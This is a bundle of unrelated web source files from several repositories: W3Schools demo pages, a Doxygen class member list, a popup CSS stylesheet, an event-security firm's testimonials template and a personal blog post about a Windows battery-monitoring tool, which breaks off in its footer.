<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_style_alignitems.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:15 GMT --> <head> <style> div#main { width: 220px; height: 300px; border: 1px solid black; display: -webkit-flex; /* Safari */ -webkit-align-items: center; /* Safari 7.0+ */ display: flex; align-items: center; } div#main div { -webkit-flex: 1; /* Safari 7.0+ */ flex: 1; } </style> </head> <body> <div id="main"> <div style="background-color:coral;">RED</div> <div style="background-color:lightblue;">BLUE</div> <div style="background-color:lightgreen;">Green div with more content.</div> </div> <p>Click the button to set the value of the alignItems property to "flex-start"</p> <button onclick="myFunction()">Try it</button> <script> function myFunction() { document.getElementById("main").style.WebkitAlignItems = "flex-start"; // Code for Safari 7.0+ document.getElementById("main").style.alignItems = "flex-start"; } </script> <p><b>Note:</b> Internet Explorer 10 and earlier versions do not support the alignItems property.</p> <p><b>Note:</b> Safari 7.0 (and newer) supports an alternative, the WebkitAlignItems property.</p> </body> <!-- Mirrored from www.w3schools.com/jsref/tryjsref_style_alignitems.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:15 GMT --> </html>
doxygen/html/classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index-members.html
ivan-zapreev/Back-Off-Language-Model-SMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.10"/> <title>My Project: Member List</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">My Project </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.10 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="classes.html"><span>Class&#160;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="namespaceuva.html">uva</a></li><li class="navelem"><a class="el" href="namespaceuva_1_1smt.html">smt</a></li><li class="navelem"><a class="el" href="namespaceuva_1_1smt_1_1tries.html">tries</a></li><li class="navelem"><a class="el" href="namespaceuva_1_1smt_1_1tries_1_1dictionary.html">dictionary</a></li><li class="navelem"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">AWordIndex</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="headertitle"> <div class="title">uva::smt::tries::dictionary::AWordIndex Member List</div> </div> </div><!--header--> <div class="contents"> <p>This is the complete list of members for <a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a>, including all inherited members.</p> <table class="directory"> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a2c2538512ccdb89cf1371805e92d9126">count_word</a>(const TextPieceReader &amp;token)</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a30ecbfbd6b316bf1f3ff246bc0fca759">do_post_actions</a>()</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#af8b78345c3fb4b5dea625108267cd416">do_post_word_count</a>()</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#abe32fedd03b6f72d38ecc88d47034b65">EXTRA_NUMBER_OF_WORD_IDs</a></td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">static</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a1cc4951136f05491e1fe6a9e4fe5ab38">get_number_of_words</a>(const size_t num_words) const </td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a71e2ec73dbc78e48d24cdc7bd6cff5dc">get_word_id</a>(const TextPieceReader &amp;token) const </td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#afd124ead7086c4f9943d3261ee4b4d78">is_post_actions_needed</a>() const </td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#af09a04eb8a768c9dedbcad906af9da1e">is_word_counts_needed</a>() const </td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a5417a50c625a15ac1268139d18403b91">MIN_KNOWN_WORD_ID</a></td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">static</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a59cb30bc96710c776b7788895281acea">register_word</a>(const TextPieceReader &amp;token)</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#aa4ab5aba3627ab6d85f38ae23f3b66e1">reserve</a>(const size_t num_words)</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#ac88fb565f5b572fdac67d546c124cfa8">UNDEFINED_WORD_ID</a></td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">static</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a975e0ce3eb5986019ef5b67cff84806e">UNKNOWN_WORD_ID</a></td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">static</span></td></tr> <tr><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#a2059cfaea3b8d1253cafb9b3ccb1cc28">UNKNOWN_WORD_STR</a></td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">static</span></td></tr> <tr class="even"><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html#add51fdbee0f95e39c6ffee341ad8d586">~AWordIndex</a>()</td><td class="entry"><a class="el" href="classuva_1_1smt_1_1tries_1_1dictionary_1_1_a_word_index.html">uva::smt::tries::dictionary::AWordIndex</a></td><td class="entry"><span class="mlabel">inline</span><span class="mlabel">virtual</span></td></tr> </table></div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.10 </small></address> </body> </html>
wp-content/plugins/feed-them-social/feeds/css/magnific-popup.css
willford1/podehole
/* Magnific Popup CSS */ .mfp-bg { top: 0; left: 0; width: 100%; height: 100%; z-index: 10042 !important; overflow: hidden; position: fixed; background: #0b0b0b; opacity: 0.8; filter: alpha(opacity=80); } .mfp-wrap { top: 0; left: 0; width: 100%; height: 100%; z-index: 10043 !important; position: fixed; outline: none !important; -webkit-backface-visibility: hidden; } .mfp-container { text-align: center; position: absolute; width: 100%; height: 100%; left: 0; top: 0; padding: 0 8px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .mfp-container:before { content: ''; display: inline-block; height: 100%; vertical-align: middle; } .mfp-align-top .mfp-container:before { display: none; } .mfp-content { position: relative; display: inline-block; vertical-align: middle; margin: 0 auto; text-align: left; z-index: 1045; } .mfp-inline-holder .mfp-content, .mfp-ajax-holder .mfp-content { width: 100%; cursor: auto; } .mfp-ajax-cur { cursor: progress; } .mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close { cursor: -moz-zoom-out; cursor: -webkit-zoom-out; cursor: zoom-out; } .mfp-zoom { cursor: pointer; cursor: -webkit-zoom-in; cursor: -moz-zoom-in; cursor: zoom-in; } .mfp-auto-cursor .mfp-content { cursor: auto; } .mfp-close, .mfp-arrow, .mfp-preloader, .mfp-counter { -webkit-user-select: none; -moz-user-select: none; user-select: none; } .mfp-loading.mfp-figure { display: none; } .mfp-hide { display: none !important; } .mfp-preloader { color: #cccccc; position: absolute; top: 50%; width: auto; text-align: center; margin-top: -0.8em; left: 8px; right: 8px; z-index: 1044; } .mfp-preloader a { color: #cccccc; } .mfp-preloader a:hover { color: white; } .mfp-s-ready .mfp-preloader { display: none; } .mfp-s-error .mfp-content { display: none; } button.mfp-close, button.mfp-arrow { overflow: visible; cursor: pointer; background: transparent; border: 0; -webkit-appearance: none; display: block; outline: none; padding: 0; z-index: 1046; -webkit-box-shadow: none; box-shadow: none; } button::-moz-focus-inner { padding: 0; border: 0; } .mfp-close { width: 44px; height: 44px; line-height: 44px; position: absolute; right: 0; top: 0; text-decoration: none; text-align: center; opacity: 0.65; filter: alpha(opacity=65); padding: 0 0 18px 10px; color: white; font-style: normal; font-size: 28px; font-family: Arial, Baskerville, monospace; } .mfp-close:hover, .mfp-close:focus { opacity: 1; filter: alpha(opacity=100); } .mfp-close:active { top: 1px; } .mfp-close-btn-in .mfp-close { color: #333333; } .mfp-image-holder .mfp-close, .mfp-iframe-holder .mfp-close { color: white; right: -6px; text-align: right; padding-right: 6px; width: 100%; } .mfp-counter { position: absolute; top: 0; right: 0; color: #cccccc; font-size: 12px; line-height: 18px; } .mfp-arrow { position: absolute; opacity: 0.65; filter: alpha(opacity=65); margin: 0; top: 50%; margin-top: -55px; padding: 0; width: 90px; height: 110px; -webkit-tap-highlight-color: rgba(0, 0, 0, 0); } .mfp-arrow:active { margin-top: -54px; } .mfp-arrow:hover, .mfp-arrow:focus { opacity: 1; filter: alpha(opacity=100); } .mfp-arrow:before, .mfp-arrow:after, .mfp-arrow .mfp-b, .mfp-arrow .mfp-a { content: ''; display: block; width: 0; height: 0; position: absolute; left: 0; top: 0; margin-top: 35px; margin-left: 35px; border: medium inset transparent; } .mfp-arrow:after, .mfp-arrow .mfp-a { border-top-width: 13px; border-bottom-width: 13px; top: 8px; } .mfp-arrow:before, .mfp-arrow .mfp-b { border-top-width: 21px; border-bottom-width: 21px; opacity: 0.7; } .mfp-arrow-left { left: 0; } .mfp-arrow-left:after, .mfp-arrow-left .mfp-a { border-right: 17px solid white; margin-left: 31px; } .mfp-arrow-left:before, .mfp-arrow-left .mfp-b { margin-left: 25px; border-right: 27px solid #3f3f3f; } .mfp-arrow-right { right: 0; } .mfp-arrow-right:after, .mfp-arrow-right .mfp-a { border-left: 17px solid white; margin-left: 39px; } .mfp-arrow-right:before, .mfp-arrow-right .mfp-b { border-left: 27px solid #3f3f3f; } .mfp-iframe-holder { padding-top: 40px; padding-bottom: 40px; } .mfp-iframe-holder .mfp-content { line-height: 0; width: 100%; max-width: 900px; } .mfp-iframe-holder .mfp-close { top: -40px; } .mfp-iframe-scaler { width: 100%; height: 0; overflow: hidden; padding-top: 56.25%; } .mfp-iframe-scaler iframe { position: absolute; display: block; top: 0; left: 0; width: 100%; height: 100%; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); background: black; } /* Main image in popup */ img.mfp-img { width: auto; max-width: 100%; height: auto; display: block; line-height: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; padding: 40px 0 40px; margin: 0 auto; } /* The shadow behind the image */ .mfp-figure { line-height: 0; } .mfp-figure:after { content: ''; position: absolute; left: 0; top: 40px; bottom: 40px; display: block; right: 0; width: auto; height: auto; z-index: -1; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); background: #444444; } .mfp-figure small { color: #bdbdbd; display: block; font-size: 12px; line-height: 14px; } .mfp-figure figure { margin: 0; } .mfp-bottom-bar { margin-top: -36px; position: absolute; top: 100%; left: 0; width: 100%; cursor: auto; } .mfp-title { text-align: left; line-height: 18px; color: #f3f3f3; font-size: 14px; word-wrap: break-word; padding-right: 56px; } .mfp-image-holder .mfp-content { max-width: 100%; } .mfp-gallery .mfp-image-holder .mfp-figure { cursor: pointer; } @media screen and (max-width: 800px) and (orientation: landscape), screen and (max-height: 300px) { /** * Remove all paddings around the image on small screen */ .mfp-img-mobile .mfp-image-holder { padding-left: 0; padding-right: 0; } .mfp-img-mobile img.mfp-img { padding: 0; } .mfp-img-mobile .mfp-figure:after { top: 0; bottom: 0; } .mfp-img-mobile .mfp-figure small { display: inline; margin-left: 5px; } .mfp-img-mobile .mfp-bottom-bar { background: rgba(0, 0, 0, 0.6); bottom: 0; margin: 0; top: auto; padding: 3px 5px; position: fixed; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .mfp-img-mobile .mfp-bottom-bar:empty { padding: 0; } .mfp-img-mobile .mfp-counter { right: 5px; top: 3px; } .mfp-img-mobile .mfp-close { top: 0; right: 0; width: 35px; height: 35px; line-height: 35px; background: rgba(0, 0, 0, 0.6); position: fixed; text-align: center; padding: 0; } } @media all and (max-width: 900px) { .mfp-arrow { -webkit-transform: scale(0.75); transform: scale(0.75); } .mfp-arrow-left { -webkit-transform-origin: 0; transform-origin: 0; } .mfp-arrow-right { -webkit-transform-origin: 100%; transform-origin: 100%; } .mfp-container { padding-left: 6px; padding-right: 6px; } } .mfp-ie7 .mfp-img { padding: 0; } .mfp-ie7 .mfp-bottom-bar { width: 600px; left: 50%; margin-left: -300px; margin-top: 5px; padding-bottom: 5px; } .mfp-ie7 .mfp-container { padding: 0; } .mfp-ie7 .mfp-content { padding-top: 44px; } .mfp-ie7 .mfp-close { top: 0; right: 0; padding-top: 0; } /* overlay at start */ .fts-instagram-fade.mfp-bg { opacity: 0; -webkit-transition: all 0.15s ease-out; -moz-transition: all 0.15s ease-out; transition: all 0.15s ease-out; } /* overlay animate in */ .fts-instagram-fade.mfp-bg.mfp-ready { opacity: 0.8; } /* overlay animate out */ .fts-instagram-fade.mfp-bg.mfp-removing { opacity: 0; } /* content at start */ .fts-instagram-fade.mfp-wrap .mfp-content { opacity: 0; -webkit-transition: all 0.15s ease-out; -moz-transition: all 0.15s ease-out; transition: all 0.15s ease-out; } /* content animate it */ .fts-instagram-fade.mfp-wrap.mfp-ready .mfp-content { opacity: 1; } /* content animate out */ .fts-instagram-fade.mfp-wrap.mfp-removing .mfp-content { opacity: 0; }
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/dom/try_dom_document_childnodes.html
platinhom/ManualHom
<!DOCTYPE html> <html> <!-- Mirrored from www.w3schools.com/dom/try_dom_document_childnodes.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:14 GMT --> <head> <script src="loadxmldoc.js"> </script> </head> <body> <script> xmlDoc=loadXMLDoc("books.xml"); x=xmlDoc.childNodes; for (i=0;i<x.length;i++) { document.write("Nodename: " + x[i].nodeName); document.write(" (nodetype: " + x[i].nodeType + ")<br>"); } </script> </body> <!-- Mirrored from www.w3schools.com/dom/try_dom_document_childnodes.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:14 GMT --> </html>
client/templates/pages/resources.html
sscaff1/centurytradeshow
<template name="resources"> <div class="container-fluid"> <div class="row" style="position:relative;"> <img class="img-responsive resource-image" style="min-height:200px;" src="/img/resource home page.jpeg"> <h2 class="resource-title" style="position:absolute;top:50px;left:75px;">Security Resource<br/>Center</h2> </div> </div> <div class="container"> <h3>Read More About Us</h3> <p class="lead">Century Security has been a valued partner of our company for approximately 10 years. Their consistent high level of service is what separates them from the competition. They have provided us security services for our events nationwide, large and small. This is a testament to the professionalism of their event managers and leadership. Cory Keith, Manager – Meeting and Event Security, McDonald’s Corporation</p> <blockquote> <p>At both the PGA Merchandise Show in Orlando and ISC West in Las Vegas, Century is one of the most responsive and accommodating firms I have worked with. I always feel confident that any situation or request will be given the proper attention and seen through to the end.</p> <footer>Jason Cedrone<br/><cite title="Source Title">Senior Operations Manager, Reed Exhibitions</cite></footer> </blockquote> <hr/> <blockquote> <p>Again thank you to you and your team for an exceptional security personnel, never have I seen such professional[ism] from a security team. Again thank you and we look forward to continuing working with you in the future.</p> <footer>Dania Echeverri<br/><cite title="Source Title">Universal Music Group, 2009 Latin Grammy Awards Universal After Party</cite></footer> </blockquote> <hr/> <blockquote> <p>Having used Century Security for several years on our American College of Cardiology annual meeting and expo (in addition to having worked with them prior to joining ACC), I’ve always appreciated the high level of professionalism and dedication to our account. Century’s event managers always seem to pride themselves on running a tight ship and being responsive to the needs of all the players on our large event management staff – including floor managers, general contractor, and other key vendors. The company’s management really becomes part of our “team” in advance of the meeting and on-site. Century knows what’s needed to ensure a safe and secure meeting for all participants, and I’ve enjoyed working with them.</p> <footer>Kent Riffert<br/><cite title="Source Title">Associate Director – Exposition Logistics, American College of Cardiology</cite></footer> </blockquote> <hr/> <blockquote> <p>We did receive excellent feedback on the service. We look forward to more and future cooperative venture.</p> <footer>John Engbeck<br/><cite title="Source Title">American Private Security, Inc., Andre Agassi Book Signing</cite></footer> </blockquote> </div> </template>
_site/articles/battery-state/index.html
Drusy/drusy.github.io
<!doctype html> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if (IE 7)&!(IEMobile)]><html class="no-js lt-ie9 lt-ie8" lang="en"><![endif]--> <!--[if (IE 8)&!(IEMobile)]><html class="no-js lt-ie9" lang="en"><![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"><!--<![endif]--> <head> <meta charset="utf-8"> <title>Battery State &#8211; Kévin Renella</title> <meta name="description" content="Laptop battery state (wear level)"> <meta name="keywords" content="C++, Qt, battery, laptop"> <!-- Twitter Cards --> <meta name="twitter:card" content="summary"> <meta name="twitter:image" content="http://drusy.github.io/images/rounded-avatar.png"> <meta name="twitter:title" content="Battery State"> <meta name="twitter:description" content="Laptop battery state (wear level)"> <meta name="twitter:creator" content="@_Drusy"> <!-- Open Graph --> <meta property="og:locale" content="en_US"> <meta property="og:type" content="article"> <meta property="og:title" content="Battery State"> <meta property="og:description" content="Laptop battery state (wear level)"> <meta property="og:url" content="http://drusy.github.io/articles/battery-state/"> <meta property="og:site_name" content="Kévin Renella"> <link rel="canonical" href="http://drusy.github.io/articles/battery-state/"> <link href="http://drusy.github.io/feed.xml" type="application/atom+xml" rel="alternate" title="Kévin Renella Feed"> <link rel="author" href="https://plus.google.com/u/0/+KevinRenella?rel=author"> <!-- http://t.co/dKP3o1e --> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- For all browsers --> <link rel="stylesheet" href="http://drusy.github.io/assets/css/main.min.css"> <link rel="stylesheet" href="http://drusy.github.io/assets/css/custom.css"> <!-- Webfonts --> <script src="//use.edgefonts.net/source-sans-pro:n2,i2,n3,i3,n4,i4,n6,i6,n7,i7,n9,i9;source-code-pro:n4,n7;volkhov.js"></script> <meta http-equiv="cleartype" content="on"> <!-- Load Modernizr --> <script src="http://drusy.github.io/assets/js/vendor/modernizr-2.6.2.custom.min.js"></script> <!-- Icons --> <!-- 16x16 --> <link rel="shortcut icon" href="http://drusy.github.io/favicon.ico"> <!-- 32x32 --> <link rel="shortcut icon" href="http://drusy.github.io/favicon.png"> <!-- 57x57 (precomposed) for iPhone 3GS, pre-2011 iPod Touch and older Android devices --> <link rel="apple-touch-icon-precomposed" href="http://drusy.github.io/images/apple-touch-icon-precomposed.png"> <!-- 72x72 (precomposed) for 1st generation iPad, iPad 2 and iPad mini --> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="http://drusy.github.io/images/apple-touch-icon-72x72-precomposed.png"> <!-- 114x114 (precomposed) for iPhone 4, 4S, 5 and post-2011 iPod Touch --> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="http://drusy.github.io/images/apple-touch-icon-114x114-precomposed.png"> <!-- 144x144 (precomposed) for iPad 3rd and 4th generation --> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="http://drusy.github.io/images/apple-touch-icon-144x144-precomposed.png"> <!-- Magnific popup --> <!-- Magnific Popup core CSS file --> <link rel="stylesheet" href="http://drusy.github.io/assets/magnific-popup/magnific-popup.css"> <!-- jQuery 1.7.2+ or Zepto.js 1.0+ --> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script> <!-- Magnific Popup core JS file --> <script src="http://drusy.github.io/assets/magnific-popup/jquery.magnific-popup.js"></script> </head> <body id="post"> <div class="navigation-wrapper"> <nav role="navigation" id="site-nav" class="animated drop"> <ul> <li> <a href="http://drusy.github.io/about/">About</a> </li> <li> <a href="http://drusy.github.io/articles/">Articles</a> </li> <li> <a href="http://drusy.github.io/cv-resume/">CV/Resume</a> </li> <li> <a href="/articles/files-drag-and-drop/">Files Drag & Drop</a> </li> <li><a href="http://drusy.github.io/feed.xml" title="Atom/RSS feed"><i class="icon-rss"></i> Feed</a></li> <li class="dosearch"><i class="icon-search"></i> Search</li> </ul> </nav> </div><!-- /.navigation-wrapper --> <!--[if lt IE 9]><div class="upgrade"><strong><a href="http://whatbrowser.org/">Your browser is quite old!</strong> Why not upgrade to a different browser to better enjoy this site?</a></div><![endif]--> <div class="search-wrapper"> <div class="search-form"> <input type="text" class="search-field" placeholder="Search..."> <i class="icon-remove-sign icon-2x"></i> <ul class="search-results post-list"></ul><!-- /.search-results --> </div><!-- /.search-form --> </div><!-- ./search-wrapper --> <header class="masthead"> <div class="wrap"> <a href="http://drusy.github.io" class="site-logo" rel="home" title="Kévin Renella"><img src="http://drusy.github.io/images/rounded-avatar.png" width="200" height="200" alt="Kévin Renella logo" class="animated fadeInUp"></a> <h1 class="site-title animated fadeIn"><a href="http://drusy.github.io">Kévin Renella</a></h1> <h2 class="site-description animated fadeIn" itemprop="description">My own simple blog</h2> </div> </header><!-- /.masthead --> <div id="main" role="main"> <article class="hentry"> <div class="entry-wrapper"> <header class="entry-header"> <span class="entry-tags"><a href="http://drusy.github.io/tags/#C++" title="Pages tagged C++">C++</a>&nbsp;&bull;&nbsp;<a href="http://drusy.github.io/tags/#Qt" title="Pages tagged Qt">Qt</a>&nbsp;&bull;&nbsp;<a href="http://drusy.github.io/tags/#battery" title="Pages tagged battery">battery</a>&nbsp;&bull;&nbsp;<a href="http://drusy.github.io/tags/#laptop" title="Pages tagged laptop">laptop</a></span> <h1 class="entry-title">Battery State</h1> </header> <footer class="entry-meta"> <img src="http://drusy.github.io/images/profile-kr.png" alt="Kévin Renella photo" class="author-photo"> <span class="author vcard">By <span class="fn"><a href="http://drusy.github.io/about/" title="About Kévin Renella">Kévin Renella</a></span></span> <span class="entry-date date published"><time datetime="2012-01-01T00:00:00+01:00"><i class="icon-calendar-empty"></i> January 01, 2012</time></span> <span class="entry-date date modified"><time datetime="2014-04-08"><i class="icon-pencil"></i> April 08, 2014</time></span> <span class="entry-comments"><i class="icon-comment-alt"></i> <a href="#disqus_thread">Comment</a></span> <span><a href="http://drusy.github.io/articles/battery-state/" rel="bookmark" title="Battery State"><i class="icon-link"></i> Permalink</a></span> <span class="social-share-facebook"> <a href="https://www.facebook.com/sharer/sharer.php?u=http://drusy.github.io/articles/battery-state/" title="Share on Facebook" itemprop="Facebook"><i class="icon-facebook-sign"></i> Like</a></span> <span class="social-share-twitter"> <a href="https://twitter.com/intent/tweet?hashtags=articles&text=Battery State&url=http://drusy.github.io/articles/battery-state/&via=_Drusy" title="Share on Twitter" itemprop="Twitter"><i class="icon-twitter-sign"></i> Tweet</a></span> <span class="social-share-googleplus"> <a href="https://plus.google.com/share?url=http://drusy.github.io/articles/battery-state/" title="Share on Google Plus" itemprop="GooglePlus"><i class="icon-google-plus-sign"></i> +1</a></span> <!-- /.social-share --> </footer> <div class="entry-content"> <p>Any of the available software on windows fits my needs about battery usage, wear level etc. so I decided to develop my own. I would like a software that :</p> <ul> <li>is really light</li> <li>that can show me the wear level of my battery</li> <li>is running in background</li> <li>show the basics about the laptop battery</li> </ul> <p>I have written this software with C++/Qt and using the native C API of Windows to get the battery informations.</p> <div class="zoom-gallery"> <figure class="half"> <a href="/images/battery-state/battery-state.png"><img src="/images/battery-state/battery-state.png" /></a> <a href="/images/battery-state/battery-tray.png"><img src="/images/battery-state/battery-tray.png" /></a> <figcaption>Battery State screenshots</figcaption> </figure> </div> <p>Currently this is a quick and dirty implementation and it is restricted to Windows but I plan to extend the compatibility to OS X, make it a bit more sexy and clean the code to push it on GitHub.</p> <div id="disqus_thread"></div><!-- /#disqus_thread --> </div><!-- /.entry-content --> </div><!-- /.entry-wrapper --> <nav class="pagination" role="navigation"> <a href="http://drusy.github.io/articles/shot-detector/" class="btn" title="Shot detector">Previous article</a> <a href="http://drusy.github.io/articles/lagrange-plot/" class="btn" title="Lagrange plot">Next article</a> </nav><!-- /.pagination --> </article> </div><!-- /#main --> <div class="footer-wrapper"> <footer role="contentinfo"> <span>&copy; 2014 Kévin Renella. Powered by <a href="http://jekyllrb.com">Jekyll</a> using the <a href="http://mademistakes.com/so-simple/">So Simple Theme</a>.</span> <div class="social-icons"> <a href="http://twitter.com/_Drusy" title="Kévin Renella on Twitter" target="_blank"><i class="icon-twitter icon-2x"></i></a> <a href="http://facebook.com/kevin.renella" title="Kévin Renella on Facebook" 